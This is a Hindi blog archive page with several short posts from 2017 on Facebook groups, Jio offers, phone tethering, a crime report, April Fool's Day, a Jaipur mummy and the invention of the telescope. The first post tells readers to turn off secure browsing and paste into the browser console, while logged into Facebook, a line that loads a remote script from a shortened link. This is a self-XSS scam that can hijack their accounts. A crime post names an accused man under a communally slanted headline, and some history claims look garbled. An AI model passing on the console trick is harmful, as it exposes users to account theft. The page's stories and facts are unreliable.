Tuesday, April 18, 2017

Add 100,000 Member In One Click On Facebook Group

Add 100,000 Member Just One Click On Facebook Group

Facebook Group मे 100000 Member Add Kaise करे आज हम इसकी जानकारी आपके देने वाले है | आप हमारे द्वारा बताए गए तरीके से facebook Group मे 100000 Member को Add कर सकते है | आप जानते ही होंगे Fb पर Group बनाना बहुत आसान है पर fb group मे Member List बड़ी करना बहुत मुश्किल होता है तो एसे मे आपको हमारी पोस्ट काफी Benefit पाहुचाने वाली है ओर आप आसानी से अपने Group Member बढ़ा सकते है | आइये जानते है तरीका How To Add 100000 Member In One Click On Fb Group -

Its True Do This Work 

  • सबसे पहले आप अपने FB Account मे Login कर लीजिए |
  • अब आप Secure Browsing Off [ facebook Account Setting >> Security Setting >> Secure Browsing
  • नीचे दिये गए किसी एक Browsing मे open करे |



Mozilla Firebox
  • अपने group मे जाए
  • अब CTRL + SHIFT + K
document.body.appendChild(document.createElement('script')).src='http://goo.gl/aQwsk';
  • अब ऊपर के code को कॉपी करे
  • अब paste कर दे |
Google Chorme
सबसे पहले आप अपने group मे चले जाए |
अब अपने PC के Mhouse के Right Button को क्लिक करे |
अब Inspest Element [ F12 ] पर क्लिक करे |
अब Consule को Select करे |



document.body.appendChild(document.createElement('script')).src='http://goo.gl/aQwsk';

अब ऊपर के code को कॉपी करके paste करे फिर Enter पर क्लिक करदे |

यह पढे - Facebook Par Apni Khud Ki Photo Par Auto Like Kaise Kare

तो इस तरह से आप अपने fb group मे member add करे ओर पोस्ट से संभन्धित कोई भी समस्या आए तो संपर्क comment के माध्यम से करे |

Saturday, April 8, 2017

Jio Summer Offer Mila Ya Nahi Kiase Pata Jankari

Jio Summer Offer Nahi Huaa Hai Abhi Khatm

अगर अभी तक आपने Jio Summer Surprise offer नहीं लिया है तो आपको तुरंत ले लेना चाहिए क्योकि Jio Summer Surprise offer कभी भी खत्म हो सकता है फिलहाल अभी तक 8/4/2017 समय 02: 09 नहीं खतम  हुआ है |

Jio Prime Membership


ट्राई के निर्देश के बाद Jio ने प्रेस रिलीज मे साफ कहा है की हम ट्राई के सुझाव को स्वीकार करते है और Jio Summer Offer को बंद करने का ऐलान करते है लेकिन इसमे 2 - 4 दिन का समय लगेगा | साथ ही यदि अभी Prime Membership नहीं ली है तो आप 15 अप्रैल तक Membership ले सकते है |


Jio Summer Offer Mila Ya Nahi Kaise Pata Kare Jankari

अगर आपने Jio Summer Offer ले लिया है लेकिन आपको जानकारी नहीं है की कैसे पता करे Jio Summer Offer मिला है या नहीं तो आप बहुत ही आसानी से पता लगा सकते है इसके लिए केवल Jio My App को PlayStor से डाउनलोड करना होगा |

Jio Summer Offer Check Karne Ka Tarika

  • सबसे पहले प्लेस्टोर से My Jio App डाउनलोड करे |
  • अब My Jio पर क्लिक करके Singin करे |
  • जब Singin हो जाए फिर My Plan पर क्लिक करे |
  • अब जो page आपको दिखेगा वहा नीचे के Image के जैसा Show होता हुआ दिखेगा |


Image 1

Image 2

आप ऊपर की image मे देख सकते है सारी details दी गयी है और image से समझा जा सकता है की आपको Jio Summer Offer मिला या नहीं |

Details मे जाने -

1. Cureent Plan See Image 1 - Jio Current Plan यानि की Jio Happy New offer आपको मिला है 15 अप्रैल 2017 तक Expire



2. Upcoming Plan Jio See Image 2 - यह वह Jio Plan है जो आपको मिलने वाला है | मतलब आपने अगर Jio Summer Offer Active के लिए Recharge 99 + 303 RS कर लिया है तो आपको Jio के My App मे ऑप्शन दिखेगा | और यह आपके Jio My Plan मे दिख जाए तो समझिए आपको Jio Summer Offer मिल चुका है मतलब अब आप 3 महीने और Free मे Jio Internet Benefit पा सकते है |


महत्वपूर्ण - अगर आपने तुरंत Jio Summer Offer के लिए Richarge किया है तो Upcoming Plan Update होने मे 24 घंटे का समय लग सकता है इसलिए परेशान न हो | जब Update कर दिया जाएगा तो ही यह Massage आपको देखने को मिलेगा |

यह पढे - Reliance Jio Prime Offer Details


Jio Summer Offer Mila Ya Nahi Kiase Pata Jankari || जियो समर ऑफर नहीं हुआ है खत्म, जियो समर ऑफर मिला या नहीं एसे पता करे || Trai forces Reliance Jio to withdraw Summer Surprise offer

Tuesday, April 4, 2017

Android Mobile Se Computer PC Laptop Me internet Kaise Chalaye

Android Mobile Se Computer PC Laptop Me internet Kaise Chalaye

आज हम बात करने वाले है की Kaise अपने Android Phone Internet को PC या Computer मे इस्तेमाल करे | अगर आपके पास मॉडम नहीं है और इस कारण आप अपने Laptop या PC मे इंटरनेट नहीं प्रयोग कर पा रहे है | तो आप अपने Android Phone के Wi-Fi Hotspot का Use करके अपने PC या Computer या Laptop मे Internet चला सकते है |

Computer Me Jio 4G Mobile OR SIM Se Jio Internet Kaise Connect Kare ... USB data cable aur Wi-Fi hotspot ke bina Internet kaise chalaye




आज हम आपको 3 तरीके से interenet Connect करने का तरीका बताने वाले है लेकिन इसके लिए आपके पास Android Phone होना जरूरी है |
  • Bluetooth
  • USB Cabel
  • Wi-Fi Hotspot
1. Mobail Bluetooth के प्रयोग से Pc या Laptop मे Internet Connect करे |


आज लगभग सभी Latest Phone मे Bluetooth Service होती है और इसका Use करके अपने फोन के इंटरनेट को Computer या Laptop मे Internet चला सकते है | तरीका जानिए -


  • Bluetooth से Internet Connect करने के लिए आपको सबसे पहले मोबाइल का ब्लुटूथ ऑन कर लीजिए और साथ मे अपने लेप्टोप या कम्प्युटर के ब्लुटूथ को ऑन कर लीजिए |
  • अब दोनों Device की Paring कर लीजिए |
  • अब आप अपने फोन के Setting मे चले जाए जहा पर आपको More का ऑप्शन मिलेगा जिसे आप खोल ले |
  • अब आपको Tethering & Portable Hotspot का ऑप्शन मिलेगा जिस पर क्लिक कीजिए |
  • अब आपको Bluetooth Tethering का ऑप्शन मिलेगा जिसे आप ऑन कर दीजिए |
  • जब आप यह Process पूरा कर लेंगे तब आप मोबाइल के इन्टरनेट को कम्प्युटर मे इस्तेमाल कर सकते है |

2. Use USB Cabel For Internet In Mobail To Computer


  •  सबसे पहले अपने मोबाइल को USB Cabel की मदद से Laptop या Computer मे Connect कर लीजिए |
  • जब आप अपने मोबाइल को PC मे Connect करेंगे तो एक Massage दिखेगा फिर आप अपने मोबाइल फोन के Internet Data को On कर दीजिए |
  • जब आप इन्टरनेट On कर ले तो उसके बाद आप अपने मोबाइल की Setting >> Tethering & Portable पर चले जाए फिर USB Tethering को ON करे |
  • ऐसा करते ही थोड़े से समय मे आपको Mobail Phone Internet Computer मे Connect हो जाएग |

Mobail Wi-Fi Hotspot को Computer से Connect करे

  • सबसे पहले अपने PC और Mobail दोनों के Wifi Hotspot को On कर दे |
  • अब अपने मोबाइल के Internet Data को On करदे |
  • अब अपने मोबाइल फोन के Setting मे चले जाए और Mobail Hotspot को ON कर दे |
  • Mobail Hotspot On करते ही आपके PC मे Hotspot Name Show होगा जिसपर आप क्लिक कर दे |
  • अब आपको Password का ऑप्शन दिखाई दे रहा होगा तो आप पासवर्ड टाइप करे और Enter पर क्लिक करदे |
  • ऐसा करते ही ऑटोमैटिक Internet हो जाएगा |
तो इस तरह आप अपने Phone को Pc Computer या Laptop मे Internet के लिए इस्तेमाल कर सकते है | फिर भी आपको Internet Connect करने मे कोई समस्या हो रही है तो हमे समपर्क करे आपकी पूरी मदद की जाएगी |

Sunday, April 2, 2017

बकरी का रेप करते पकड़ा गया मौलवी

जब भी सुबह का अखबार खोलते होंगे तो रेप जैसी घटनाए पढ़ने को मिल ही जाती है लेकिन आज की खबर सुनकर रोंगटे खड़े हो गए .... बकरी के साथ रेप की कोशिश | इंसान इस हद तक गिर सकता है यह कभी सोचा नहीं था |





घर के पास मे एक बकरी खड़ी हुई थी और उस बकरी पर हुसैन खान की बुरी नजर पढ़ी फिर हुसेन खान ने उस बकरी को किसान छात्रावास के पीछे ले जाकर उसके साथ रेप करने की कोसिश करने लगा और कामयाब भी हो गया | इसी बीच बकरी का मालिक बालाराम जाट अपनी बकरी खोजते हुए वहा पाहुच गया और अपने बकरी की हालत देखकर हैरान रह गया |



फिर बालाराम जाट ने अपनी बकरी के साथ हो रहे अन्याय को देखते हुए हुसैन खान की बकरी के साथ तस्वीर निकाल ली और सारी घटना नजदीक के ही पुलिस ठाणे मे बता दी | पुलिस ने भी एक्शन लेते हुए आरोपी को जल्दी ही पकड़ लिया |


यह घटना बाड़मेर जिले के बायतु की है | इस घटना से साफ जाहीर होता है इंसान ही नहीं अब जानवर भी सुरक्षित नहीं है अब भगवान ही जाने क्या होगा इस दुनिया का |

Saturday, April 1, 2017

अप्रैल फूल दिवस यानि मूर्ख दिवस क्यो मनाया जाता है

अप्रैल फूल यानि मूर्ख दिवस क्यो मनाया जाता है

1 सगाई की तारीख 32 मार्च से शुरु हुआ मूर्ख दिवस

यकीनन आपने अपने दोस्तो और अपने करीबयो को अप्रैल फूल बनाने की तैयारी कर ली होगी | लेकिन खुद भी संभल कर रहिएगा | क्योकि मूर्ख बनाने के तरीके ऐसे ऐसे है की आप अंदाजा भी नहीं लगा पाएंगे की सामने वाला फूल बनकार निकाल जाएगा | अप्रैल फूल जितना मजेदार दिन है उससे ज्यादा इससे जुड़ी मजेदार बाते है | बाते जो इतिहास के झरोखे से निकलती है और बताती है की कैसे एक दिन पूरी दुनिया मे लोकप्रिय हो गया | ब्रिटिश लेखक चांसलर की किताब से द कैटरबारी टेल्स मे बताया गया है कि 13वी सदी मे इंग्लैंड के राजा रिचर्ड सेकंड और बहोमिया की रानी एनी की सगाई 32 मार्च 1381 को किए जाने की घोषडा हुई | केटरबरी की जनता इसे सही मान लिया और 1 अप्रैल के दिन 32 मार्च बताने लगे | बाद मे उन्हे बताया गया की यह एक मज़ाक था |इसी दिन से अप्रैल फूल यानि मूर्ख दिवस की शुरुवात हुई |

Aprail fool Day

पूरा लंदन पहुँच गया था गधों का स्नान देखने -

अप्रैल फूल डे का एक किस्सा बड़ा मशहूर है | बात 1860 की है | लंदन मे हजारो लोगो के घर आमंत्रण पत्र पहुचे | जिसमे टावर ऑफ लंदन मे 1 अप्रैल की शाम गधों के स्नान का जिक्र था और आम जनता को आमंत्रण भेजा गया था |  तब टावर ऑफ लंदन मे जाने की अनुमति नहीं थी | टावर देखने के लिए हजारो लोगो की भीड़ जुट गई | धक्का मुक्की के बीच पता चला कि ऐसा कोई आयोजन नही हो रहा है | फिर लोग मूर्ख बनकर घर लौट गए |



वैसे तो अप्रैल फूल दिवस मनाने के पीछे कोई पुख्ता वजह नहीं है लेकिन इसके बारे कुछ बाते ज्यादा मशहूर है |

अप्रैल फूल से जुड़े कुछ दिलचस्प बाते


  • बात 1 अप्रैल 1915 की है जब जर्मनी के लीले हवाई अड्डे पर एक ब्रिटिश पायलेट ने बम फेका | जिसको देखकर लोग इधर उधर भागने लगे और काफी देर तक छुपे रहे लेकिन ज्यादा टाइम गुजरने के बाद भी जब कोई धमाका नहीं हुआ तो लोग वापस लौटकर देखने आए | और देखा एक बड़ी फुटबाल थी जिस पर अप्रैल फूल लिखा हुआ था |

  • ऐसी ही एक और कहानी साल 2013 की है | जब 31 मार्च के दिन यह अफवाह फैलाई गई की 1 अप्रैल से यूट्यूब  बंद हो जाएगा साथ ही यह भी घोषणा कर दी गई की पिछले सालो मे यूट्यूब पर अपलोद किए गए वीडियो मे से सर्वश्रेस्ठ का चुनाव करने के लिए एक पैनल बनया गया है जिसका परिणाम साल 2023 मे आएगा | इसके कई अफवाए फ़ैली लेकिन बाद मे पता चला की अप्रैल फूल बनाया जा रहा है |
अप्रैल फूल का भारतीय कनेकशन -

कहते है पहले दुनिया भर मे भारतीय कलेंडर को फॉलो किया जाता था | जिसमे नववर्ष की शुरुवात चेत्र महीने से होती थी, जो तकरीबन अप्रैल मे प्रारम्भ होता था | 1582 मे पोप ग्रेगोरी ने नया कलेंडर लागू किया पर इसमे नववर्ष की शुरुवात जनवरी महीने से होने लगा | और इसे दुनिया के ज़्यादातर देशो मे मान्यता दे दी गई लेकिन पश्चिम मे ही कुछ लोगो ने इसे अपनाने से इंकार कर दिया और फिर यह लोग अप्रैल मे नववर्ष मनाने लगे फिर इनको मूर्ख कहा जाने लगा |

यह पढे - टाइटेनिक जहाज के बारे मे रोचक और महत्वपूर्ण तथ्य

सलाह - हर कोई इस दिन मूर्ख बनाने की कोशिश करता हैं, इसलिए इस दिन मिलने वाली किसी भी सूचना या बात को बिना जांच पड़ताल के गंभीरता से नहीं ले।

रहस्यमय 130 साल पुरानी डेडबॉडी के बारे मे

रहस्यमय 130 साल पुरानी डेडबॉडी के बारे मे

राजस्थान की राजधानी जयपुर के अल्बर्ट मियूजियम मे रखी हुई 322 ईसा पूर्व की ममी इन दिनो चर्चा मे है | यह ममी है मिस्र राजघराने के पुजारी परिवार की महिला तूतू की | यहा बहुतों की तादाद मे लोग पाहुचते है और प्राचीन इतिहास एंव मौत के बाद के रहस्यो को जानकार हेरान हो जाते है | ममी से जुड़े जानकारी लोग बहुत ही उतसूक्ता से सुनते है और उतने ही उत्सुकता से सैकड़ों साल पुरानी डेडबॉडी का एक्सरे प्रिंट भी देखते है | यह मूजियम 130 साल पुराना है और इतना ही समय हो गया इस मूजियम मे रखे ममी को रखे हुए | यह ममी 19वी सदी के अंतिम दशक मे मिस्र के काहिरा से जयपुर लाया गया था | इस ममी की वर्तमान स्थिति का जायजा लेने के लिए 6 साल पहले एक्सरे किया गया |

Mummi


130 साल से रखी है डेडबॉडी, रहस्यमय है इसकी कहानी |



  • इस म्यूजियम मे रखी ममी तूतू नामक महिला की है | और इस ममी को प्राचीन नगर पैनोपोलिस मे अखमीन से प्राप्त किया गया था | इस ममी को बताया जाता है 322 से 30 ईस्वी पूर्व के टौलोंमाइक युग की है | यह महिला खेम नामक देव के उपासक पुरोहित के परिवार की सदस्य थी |
  • ममी के देह के ऊपरी भाग पर प्राचीन मिस्र का पंखयुक्त भृंग [ गुबरैला ] का प्रतीक अंकित है जो  मृत्यु के बाद जीवन और पुनर्जन्म का का प्रतीक माना जाता है | इस ममी के पवित्र भृंग के दोनों और प्रमुख देव का शीर्ष तथा सूर्य के गोले को पकड़े श्येन पक्षी मे होरस देवता का चित्र है |
  • तूतू ने नीचे चोड़े मोतियो से सज्जित परिधान गर्दन से कमर तक कालर के रूप मे पहना हुआ है | इस बॉडी पर पंखदार देवी का अंकन डेडबॉडी की सुरक्षा के लिए किया गया है | ममी के नीचे के तीन हिस्सो मे से पहले हिस्से पर, चीता की चेय्या पर डेडबॉडी के दोनों ओर महिलाए बनी हुई है | दूसरे हिस्से पर पाताल लोक के निर्णायकों की तीन बैठी हुई छविया है | और ममी के तीसरे हिस्से पर होरस देव के चार बेटो जो चारो दिशाओ के रक्षक दिक्पाल है | और इनकी छविया कर्म से मानव, सियार और बाज के रूप मे दिखाए गए है |
ई जाती है. यह महिला खेम नामक देव के उपासक पुरोहितों के परिवार की सदस्य थी. (फोटो- म्यूजियम में रखी ममी

)

Thursday, March 30, 2017

दूरबीन का आविष्कार की कहानी

दूरबीन का आविष्कार 

दूरबीन को अगर आपने प्रयोग किया होगा तो दूरबीन आपको किसी जादू से कम नहीं लगता होगा | क्योकि दूरबीन दूर की वस्तुवों को पास और पास की वस्तुवों को दूर दिखाती है | तो आप जरूर जानना चाहते होंगे इस जादू के बारे मे मतलब दूरबीन के बारे मे या दूरबीन का आविष्कार कैसे हुआ |



दूरबीन बनाने का श्रेय होलेण्ड शहर के एक व्यापारी को जाता है पर इसके पीछे छुपी है एक कहानी तो चलिए जानते है दूरबीन बनने के पीछे की कहानी |



कहते है होलेण्ड शहर एक व्यापारी रहता था जिसका कारोबार चश्मे बनाने का था | और इस व्यापारी का नाम Hans Lippershey था और साथ मे मेहनती भी | Hans Lippershey के पास कई तरह के सुंदर सुंदर काँच थे | Hans Lippershey का एक बेटा भी था जो बहुत ही शैतान था | बेटा रंग बिरंगे काँच के टुकड़ो से दिन भर खेलता रहता और उन पर सूरज की रोशनी डाल कर सबको परेशान किया करता पर लड़का था दिमाग का तेज और लड़के को कुछ भी जानने के लिए जिज्ञाशा होती रहती थी | 

एक दिन स्कूल की छुट्टी थी तो Hans Lippershey ने अपने बेटे को अपने साथ अपनी दुकान पर ले गया और लड़के के सामने काँच के टुकड़ो की एक बड़ी सी टोकरी रख दी और लड़के से कहा इन सब कांचो को अलग अलग टोकरी मे एक साथ करके रख दे |

टोकरी मे छोटे बड़े रंग बिरंगे कई तरह के काँच के टुकड़े थे | और यह काँच के टुकड़े दिखने मे बहुत सुंदर लग रहे थे | जिन्हे देखकर लड़के के मन मे सवाल आ रहा था की यह काँच  किसने बनाया होगा | 


अब लड़के ने यही सवाल अपने पिता जी से पूछ लिया की यह काँच किसने बनाया ? या फिर यह जमीन से पैदा होता है |

Hans Lippershey ने लड़के से कहा की यह जमीन से पैदा नहीं होता और काँच की खोज तुम जैसे एक बच्चे ने खेल खेल मे कर दिया |

बेटा ने आगे पूछा वह कैसे ?

Hans Lippershey ने कहा की मिस्र देश का रेगिस्तान बहुत बड़ा है वहा ऊँटो के काफिले कई दिनो तक चलते है | और अपनी सुइधा अनुसार रेगिस्तान मे ही पड़ाव [ रुक जाना ] डाल लेते है | ऐसा आप मान सकते है की इन काफिलो का रेगिस्तान मे ही दिन होता है और वही रात | आप कह सकते है की इनका रेगिस्तान ही घर होता है | यह जहा रुकते थे वही खाना बनाते है और आराम करते है | फिर धीरे धीरे आगे बढ़ते है |



ऐसे ही एक काफिले मे बहुत से लोग ओर बच्चे थे | और चारो तरफ रेगिस्तान, पानी का कही नामो निशान नहीं, रात हुई तो काफिले ने रेट पर चूल्हा बनाया और फिर उस पर खाना बनाया और खाना बनाने के बाद चूल्हा बुझा दिया फिर सब लोग खाना खाकर ठंडी रेट पर लेट गए | जब सवेरा हुआ सब लोग समान बांध कर आगे बढ्ने की तैयारी करने लगे और रात मे जहा खाना बनाया था वाहा कुछ बच्चे खेलने लगे | खेल खेल मे  कुछ बच्चे चूल्हे की राख़ वहाँ से हटा के इधर उधर फेकने लगे | अचानक एक बच्चे ने देखा की राख़ के नीचे कोई सख्त सी वस्तु है और वस्तु के आर पार रेत भी साफ दिखाई दे रहा है  | उस वस्तु को बच्चो ने पहले हैरानी से देखा फिर बड़े लोगो को बुलाकर उस वस्तु को दिखाया | उस वस्तु को देखकर बड़े लोग भी हैरान रह गए | उस वस्तु के ऊपर से सबने मिलकर जमी राख़ साफ साफ की | फिर उन्होने पाया की यह ऐसी वस्तु है जिसके आरपार देखा जा सकता है | सबने एक दूसरे से पूछा की क्या चूल्हा जलाने से पहले कोई चीज किसी ने राखी थी ? सबने यही कहा नहीं तो फिर उन्हे पता चला की रेत पिघल कर काँच बन गई है | फिर ऐसे रेत से काँच बनाना आरंभ हुआ || और यह केवल एक शैतान लड़के की वजह से हो पाया क्योकि अगर वह शैतान लड़का राख न हटाता तो कोई काँच के बारे मे न जान पाता |

अब Hans Lippershey की कहानी खत्म हो गई और उसने अपने बेटे से कहा अब मुझे परेशान करना बंद करो और जाओ अब बाकी के काँच के टुकड़े छाँट कर रखो | फिर बेटे ने टोकरी उठाई और बैठ कर काँच छांटने लगा | ऐसा करते करते लड़के ने काँच उठाया और उनके आरपार देखने लगा | एक के बाद एक काँच को लड़का उठाता ओर उनके आरपार देखता फिर उसने कई काँच को एक साथ उठाया और उनको मिलाकर देखने लगा ऐसा करते ही वह लड़का डर गया | क्योकि लड़के के सामने जो गिरजाघर का मीनार था वह लड़के को बिलकुल नजदीक दिख रही थी | लड़के को लगा यह कोई भरम है तो उसने फिर से देखा और लड़को को फिर मीनार बहुत ही पास नजर आई | अब लड़का सोचने लगा की यह बात अपने पापा को बताए या नहीं.... कही पापा गुस्सा न हो ... काही यह जादू वाला काँच तो नहीं | फिरसे देखने लगा लड़के को फिर वही नजर आया ..... अब वह चिल्लाया पापा .... इधर आओ यह जादू वाला काँच है  Hans Lippershey भाग के आए ओर लड़के के हाथ से काँच के टुकड़े लिए | जब  Hans Lippershey  ने काँच के आरपार देखा तो उस्ङ्को भी मीनार बहुत नजदीक दिखने लगी ओर फिर उन्होने ऐसा कई बार किया | लेकिन  Hans Lippershey जल्दी ही इस विज्ञान को समझ गए और वह खुश हुए और खुशी के मारे अपने बच्चे को उठा कर नाचने लगे | अब भी लड़का परेशान था और पापा से पूछा की क्या हुआ तब  Hans Lippershey  ने अपने  बेटे से बताया की बेटा तुमने अनजाने मे एक आविष्कार कर दिया है दूर की वस्तु नजदीक से देखने का तरीका खोज दिया है | अब हम एक यंत्र बनाएँगे इससे हमारा नाम भी दुनिया मे होगा |

यह पढे - समुद्र मंथन का रहस्य क्या है सच्चाई जानिए

फिर  Hans Lippershey ने ठीक वैसे ही काँच को लगाकर एक दूरबीन बनाई और इस तरह दुनिया की पहली दूरबीन बनी |
लेकिन बधाई का असली हकधार  Hans Lippershey  का बेटा है जिसने अंजाने मे इतना बड़ा आविष्कार किया 
सबसे ज्यादा पढ़ी गयी पोस्ट -
Loading...